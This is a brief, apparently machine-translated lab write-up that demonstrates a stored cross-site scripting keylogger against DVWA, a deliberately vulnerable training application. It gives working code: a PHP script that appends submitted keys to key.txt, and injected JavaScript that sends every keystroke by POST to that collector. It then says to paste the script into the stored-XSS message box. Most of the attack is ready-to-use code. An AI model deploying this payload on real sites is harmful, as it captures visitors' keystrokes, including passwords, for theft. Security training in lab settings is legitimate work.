Experimental environment: DVWA
Principle: When the page is implanted xss script, the average user to access this page, the user all the keyboard keys will be recorded on the current page and sent to the remote server
Experimental Procedure:
First, create a file keylog.php get keyloggers on the server, and writes records key.txt in.
php code is as follows:
<?php
$file=fopen("key.txt","a");
if(isset($_REQUEST['key'])){
$key=$_REQUEST['key'];
fputs($file,$key);
}
?>Second, write js script
<script>
window.onkeydown=function(ev){
xhr =new XMLHttpRequest();
xhr.open('POST','http://localhost/xss/keylog/keylog.php',true);
xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
xhr.send('key='+String.fromCharCode(ev.keyCode));
}
</script>
Third, open the low-level DVWA, select Save xss module, will write js script message box, code execution
Four, can be seen when the content input box, the keyboard has been recorded key.txt down
